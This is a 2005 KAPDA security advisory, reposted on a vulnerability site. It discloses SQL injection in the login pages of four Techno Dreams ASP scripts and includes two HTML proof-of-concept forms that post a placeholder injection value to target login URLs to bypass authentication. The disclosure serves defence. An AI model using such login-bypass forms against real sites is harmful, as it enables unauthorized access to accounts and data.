Computer Security

Security Advisory: [KAPDA::#9] Techno Dreams Scripts Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

  File Including In PBLang

  [SA17333] phpESP Unspecified Cross-Site Scripting and SQL Injection

  [SA17353] gCards "limit" SQL Injection Vulnerability

  [Full-disclosure] Multiple vulnerabilities within RockLiffe MailSite Express WebMail

From:advisory_(at)_kapda.ir <advisory_(at)_kapda.ir>
Date:27.10.2005
Subject:[KAPDA::#9] Techno Dreams Scripts Vulnerabilities

[KAPDA::#9]Techno Dreams Scripts Vulnerabilities

KAPDA New advisory

Vulnerable products :

Techno Dreams Announcement Script
Techno Dreams Guestbook Script
Techno Dreams Mailing List Script
Techno Dreams WebDirectory Script

Vendor: http://www.t-dreams.com/

Risk: High

Vulnerability: Sql injection

Date :
--------------------
2005/10/22

About Techno Dreams Scripts
--------------------
Techno Dreams Announcement Script

    If you have a site and want to make a section for Announcements or

  Recent News, then you might need this script.

Techno Dreams Guestbook Script

    It uses MS Access with ability to be upgraded into SQL. Now, we've

  added an Admin Area for the script.

Techno Dreams Mailing List Script :

    Let your visitors join your mailing list... and send mass emails to all

  of this list. Very good but simple ASP script (MS Access but SQL

  upgradeable).


Techno Dreams WebDirectory :

    Simple yet effect search engine (if we could say about it; since it's

  look like a web directory). With some advance features like approval,

  hits, categories, advance search, admin area, what's new, new updated,

  and what's hot...

       Vendor`s description : http://www.t-dreams.com/downloads.asp

Discussion :
----------------
 Several scripts do not properly validate user-supplied input. A remote

user can create specially crafted parameter values that will execute

SQL commands on the underlying database.

Vulnerabilities:
--------------------
Sql injection in /admin/login.asp (Announcement - Guestbook -

WebDirectory)

Sql injection in /login.asp ( Mailing List)

at parameter named 'userid'. Attacker can enter SQL command to

login as low-level user.(For all products)

Proof of Concepts:
--------------------

<html>
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script
Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://[target]/admin/login.asp">
<input type="hidden" name="userid" value="[SQL Injection]">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s
advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://[target]/login.asp">
<input type="hidden" name="userid" value="[SQL Injection}">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

Solution:
--------------------
No patch`s released yet by vendor.

More Detail:
--------------------
http://www.kapda.ir/advisory-103.html
Visit Above Link for more details.


Credit :
--------------------
Farhad Koosha of KAPDA
farhadkey [at} kapda.ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir
(PersianHacker.NET)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru